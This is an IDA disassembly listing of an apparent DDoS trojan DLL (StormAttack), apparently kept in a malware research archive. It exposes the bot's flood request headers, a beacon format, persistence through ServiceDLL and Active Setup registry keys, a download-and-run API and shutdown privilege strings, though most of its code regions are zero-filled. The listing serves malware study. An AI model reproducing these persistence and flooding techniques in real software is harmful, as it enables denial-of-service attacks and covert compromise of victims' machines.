;
; +-------------------------------------------------------------------------+
; |      This file was generated by The Interactive Disassembler (IDA)      |
; |           Copyright (c) 2026 Hex-Rays, <support@hex-rays.com>           |
; |                      License info: 14-0000-FFFF-88                      |
; |                       ntkey <admin@hex-rays.com>                        |
; +-------------------------------------------------------------------------+
;
; Input SHA256 : 312D693E0377788C57C5FD6A918CC088145A1F57DC56B5F345A117ECC8BDC684
; Input MD5    : CD8DA3A320496D0D393B794EE22EB40A
; Input CRC32  : 4D26DF85
; Compiler     : Visual C++ (guessed)

; File Name   : /home/petik/Documents/petikvx-archiver/Articles/Trojan-DDoS.Win32.StormAttack.a/artefacts/StormServer_x.dll
; Format      : Portable executable for 80386 (PE)
; Imagebase   : 10000000
; Timestamp   : 4C540E10 (Sat Jul 31 11:50:40 2010 UTC)
; Section 1. (virtual address 00001000)
; Virtual size                  : 000087D0 (  34768.)
; Section size in file          : 00008800 (  34816.)
; Offset to raw data for section: 00000400
; Flags E0000060: Text Data Executable Readable Writable
; Alignment     : default

                .686p
                .mmx
                .model flat

; ===========================================================================

; Segment type: Externs
; _idata



; ===========================================================================

; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_data           segment para public 'CODE' use32
                assume cs:_data
                ;org 1000119Ch
                assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
                align 10h
                dd offset dword_10001EA4
                dd offset word_10001ECE
                align 20h
                dd offset loc_10001B50
a19216812       db '192.168.1.2',0
                dd 5 dup(0)
                dd 50h, 0Ah, 0Fh, 1, 1F4h, 726F7453h, 6464206Dh, 4420736Fh
                dd 534Eh, 4 dup(0)
aWelcomeToUseSt db 'Welcome to use storm ddos',0
                align 4
                dd 19h dup(0)
aThankYou       db 'Thank you',0
                align 4
                dd 3Dh dup(0)
aAaaaaaaaaaaaaa db 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
                db 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa',0
                align 10h
                dd 26h dup(0)
                db 90h
                db 19h, 2 dup(0)
                dd 1234h, 4321h
aStormDSSSS     db 'STORM:%d|%s|%s|%s|%s',0
                align 4
aUMb            db '%u MB',0
                align 4
aUGb            db '%u GB',0
                align 4
aGlobalmemoryst db 'GlobalMemoryStatusEx',0
                align 4
aKernel32Dll    db 'kernel32.dll',0
                align 4
aUMhz           db '~%u MHz',0
aMhz            db '~MHz',0
                align 4
aHardwareDescri db 'HARDWARE\DESCRIPTION\System\CentralProcessor\0',0
                align 4
aWin7           db 'Win7',0
                align 4
aWinvista       db 'WinVista',0
                align 4
aWin2k3         db 'Win2K3',0
                align 10h
aWinxp          db 'WinXP',0
                align 4
aWin2k          db 'Win2K',0
                align 10h
aWinnt          db 'WinNT',0
                align 4
                dd 0B5D2A8D7h, 0E6B0h, 63252525h, 25256325h, 63256325h
                dd 0
                dd 6325h, 2Bh
aSetsockoptErro db 'setsockopt Error!',0Ah,0
                align 4
aDDDD           db '%d.%d.%d.%d',0
                dd 0C8C9BAE2h, 2E91E469h, 0ED2EF5EAh, 63A693C0h, 83FE2E35h
                dd 0AB6646DDh, 0C3852E70h, 8D36E133h, 2E97D955h, 0
aBfyl           db 'bfyl',0
                align 4
a1921681244     db '192.168.1.244',0
                align 4
aGet            db 'GET ',0
                align 10h
aHttp11         db ' HTTP/1.1',0Dh,0Ah,0
aAcceptImageGif db 'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, appl'
                db 'ication/x-shockwave-flash, application/vnd.ms-excel, application/'
                db 'vnd.ms-powerpoint, application/msword, */*',0Dh,0Ah,0
                align 4
aAcceptLanguage db 'Accept-Language: zh-cn',0Dh,0Ah,0
                align 4
aAcceptEncoding db 'Accept-Encoding: gzip, deflate',0
                align 4
aUserAgentMozil db 0Dh,0Ah
                db 'User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1'
                db ')',0
                align 10h
aHost           db 0Dh,0Ah
                db 'Host:',0
aConnectionKeep db 0Dh,0Ah
                db 'Connection: Keep-Alive',0
                align 4
                db 0Dh,0Ah
                db 0Dh,0Ah,0
                align 4
                db '/',0
                align 10h
aHttp11ContentT db ' HTTP/1.1',0Dh,0Ah
                db 'Content-Type: text/html',0
                align 4
aHost_0         db 0Dh,0Ah
                db 'Host: ',0
                align 10h
aAcceptTextHtml db 0Dh,0Ah
                db 'Accept: text/html, */*',0
                align 4
aUserAgentMozil_0 db 0Dh,0Ah
                db 'User-Agent:Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.0; My'
                db 'IE 3.01)',0
aRefererHttp    db 'Referer: http://',0
                align 4
a80Http         db ':80/http://',0
aConnectionClos db 0Dh,0Ah
                db 'Connection: Close',0
aCacheControlNo db 0Dh,0Ah
                db 'Cache-Control: no-cache',0
                align 4
aUserAgentMozil_1 db 0Dh,0Ah
                db 'User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Geck'
                db 'o/20080808 Firefox/8.0',0
                align 4
                db '=',0
                align 4
aClickOpenPage  db '>CLICK OPEN PAGE',0
                align 4
                db 0Dh,0Ah,0
                align 10h
aConnectionKeep_0 db 'Connection: Keep-Alive',0Dh,0Ah,0
                align 4
aCookie         db 'Cookie:',0
                db ':',0
                align 4
aExpires        db ' expires',0
                align 4
aHttp11AcceptAc db ' HTTP/1.1',0Dh,0Ah
                db 'Accept: */*',0Dh,0Ah
                db 'Accept-Language: zh-cn',0Dh,0Ah
                db 'Accept-Encoding: gzip, deflate',0Dh,0Ah,0
                align 4
aHost_1         db 'Host: ',0
                align 10h
aUserAgentMozil_2 db 'User-Agent:Mozilla/4.0 (compatible; MSIE 7.00; Windows NT 5.1; My'
                db 'IE 3.01)',0Dh,0Ah,0
                db '!',0
                align 10h
aXq1986         db 'xq1986',0
                align 4
aCacheControlNo_0 db 'Cache-Control: no-cache',0Dh,0Ah
                db 'Referer: http://www.google.com',0Dh,0Ah,0
                align 4
aPass           db 'pass',0
                align 4
aDD             db '%d,%d',0
                align 4
aOpen           db 'open',0
                align 4
aIexploreExe    db 'iexplore.exe',0
                align 4
                dd 0A2CFFBCFh, 0BECAE1CCh, 0
aSeshutdownpriv db 'SeShutdownPrivilege',0
aLogOff         db 'log off',0
aServicedll     db 'ServiceDLL',0
                align 10h
aSystemCurrentc db 'SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters',0
                align 4
aSystemrootSyst db '%SystemRoot%\System32\srvsvc.dll',0
                align 10h
aStubpath       db 'stubpath',0
                align 4
aSS             db '%s%s',0
                align 4
aSoftwareMicros db 'Software\Microsoft\Active Setup\Installed Components\',0
                align 4
aUrldownloadtof db 'URLDownloadToFileA',0
                align 10h
aWininetDll     db 'wininet.dll',0
aUrlmonDll      db 'urlmon.dll',0
                align 4
                db '\',0
                align 4
aOk             db 'OK',0
                align 10h
aGethostbyname  db 'gethostbyname',0
                align 10h
aWsock32Dll     db 'WSOCK32.DLL',0
aStromAttack    db 'Strom attack',0
                align 10h

loc_10001B50:                           ; DATA XREF: .data:100011C0↑o
                cmp     dword ptr [esp+8], 1
                jnz     short loc_10001B70
                call    near ptr word_100071D6
                mov     ecx, [eax+20h]
                and     dword ptr [eax+20h], 0
                mov     [eax+1Ch], ecx
                mov     ecx, [eax+2Ch]
                and     dword ptr [eax+2Ch], 0
                mov     [eax+28h], ecx

loc_10001B70:                           ; CODE XREF: .data:10001B55↑j
                push    1
                pop     eax
                retn    0Ch
; ---------------------------------------------------------------------------
                dw 0FFB8h
                dd 0E8100074h, 56D0h, 298EC81h, 65830000h, 565300D4h, 1568BF57h
                dd 0C9831000h, 8DC033FFh, 0AEF2BC55h, 0F92BD1F7h, 0C1h dup(0)
dword_10001EA4  dd 0Ah dup(0)           ; DATA XREF: .data:100011A0↑o
                db 2 dup(0)
word_10001ECE   dw 0                    ; DATA XREF: .data:100011A4↑o
                dd 14C1h dup(0)
                db 2 dup(0)
word_100071D6   dw 0                    ; CODE XREF: .data:10001B57↑p
                dd 90h dup(0)
                db 2 dup(0)
                public DllEntryPoint
; BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
DllEntryPoint   dw 0
                dd 8E1h dup(0)
;
; Export directory for MZ\x90
;
                dd 0                    ; Characteristics
                dd 0                    ; TimeDateStamp
                dw 0                    ; MajorVersion
                dw 0                    ; MinorVersion
                dd 0                    ; Name
                dd 0                    ; Base
                dd 0                    ; NumberOfFunctions
                dd 0                    ; NumberOfNames
                dd 0                    ; AddressOfFunctions
                dd 0                    ; AddressOfNames
                dd 0                    ; AddressOfNameOrdinals
                align 40h
                dd 200h dup(?)
_data           ends


                end DllEntryPoint
